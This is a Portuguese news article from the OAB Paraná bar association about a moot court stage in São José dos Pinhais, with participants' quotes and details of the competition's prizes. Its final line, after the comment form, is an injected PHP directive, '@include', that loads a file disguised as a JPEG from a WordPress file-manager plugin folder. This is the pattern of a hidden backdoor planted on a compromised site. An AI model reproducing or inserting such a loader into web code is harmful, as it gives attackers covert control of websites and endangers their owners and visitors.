Acadêmicos de Direito participam de nova etapa do I Moot de Processo Civil em São José dos Pinhais

A etapa do I Moot de Processo Civil da OAB Paraná de São José dos Pinhais mobilizou dezenas de acadêmicos de direito da região nesta quinta-feira (21/09). A etapa conta com a participação de 21 competidores, divididos em três equipes. 

Assim como nas etapas realizadas nas cidades de Cascavel, Francisco Beltrão, Londrina, Maringá, Guarapuava e Curitiba, os participantes debatem um caso de acidente de trânsito em que se discute coisa julgada, durante um julgamento simulado do Tribunal de Justiça do Paraná (TJ-PR). O caso hipotético foi elaborado pelo jurista Luiz Guilherme Marinoni,  um dos maiores nomes do Direito Processual Civil nacional, especialmente para o evento da OAB Paraná.

As acadêmicas Eduarda Tiradentes de Souza e Juliana Tais da Rocha Bueno fizeram a sustentação em defesa do apelante. A experiência foi, na avaliação delas, foi bastante produtiva. “Houve muita preparação para isso. Foram dois meses de muito estudo, preparação e ansiedade”, disse Eduarda.

“Foi  uma experiência muito legal, é a nossa primeira sustentação oral. É bom saber que quando formos advogar de fato já teremos passado por essa experiência”, avaliou Juliana.

A professora universitária Bruna Hanthorne, orientadora das acadêmicas de Direito, falou da alegria em acompanhar a evolução dos estudantes que participaram da competição. “Que bom que a OAB tem esse incentivo para os alunos irem além, aprendendo oratória, a ganhar, a perder, isso na advocacia também é importante. Espero que seja a primeira de muitas, foi uma alegria”, disse.

A advogada Patrícia Précoma, conselheira estadual da OAB Paraná, integrou a banca avaliadora ao lado da também conselheira Laola Marinho de Oliveira e do vice-presidente da OAB São José dos Pinhais, Fernando Firmino.

“Tive uma experiência semelhante quando estudante de Direito. Agora, do outro lado, compondo a banca avaliadora, vejo que é uma experiência ímpar. Foi uma grande oportunidade dada pela OAB. Sem dúvidas teremos outras iniciativas semelhantes nos próximos anos”, avaliou Patrícia.

“É uma iniciativa muito boa, excelente para a advocacia e principalmente para os acadêmicos. É uma oportunidade que integra e auxilia com a formação de novos profissionais”, pontuou Fernando Firmino.

Sobre o Moot da OAB Paraná 

O evento acadêmico de julgamento simulado é voltado para estudantes de Direito e já é considerado o maior do Brasil, com 91 equipes inscritas e 533 participantes.  

Na primeira fase, os competidores apresentaram memoriais e participaram das rodadas de sustentações orais. Eles contam com o apoio de orientadores e de mentores indicados pelas faculdades e subseções da OAB Paraná. As semifinais e as finais vão ocorrer em Curitiba durante a 8ª Conferência da Advocacia Paranaense, em outubro.

A equipe vencedora receberá um prêmio de R$12 mil. As segunda e terceira colocadas levam prêmios de R$8 mil e R$4 mil, respectivamente. Os estudantes vencedores ganham ainda cursos da Escola Superior da Advocacia (ESA) e oportunidade de imersão em escritórios. Serão premiados também o melhor memorial (R$1.500) e o melhor orador (R$ 1.500.) Os avaliadores são advogados ou professores convidados pela comissão organizadora.

Confira a galeria de imagens no Flickr da OAB Paraná

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

@include "wp-content/plugins/wp-file-manager/lib/php/editors/OnlineConvert/include/0168.jpg";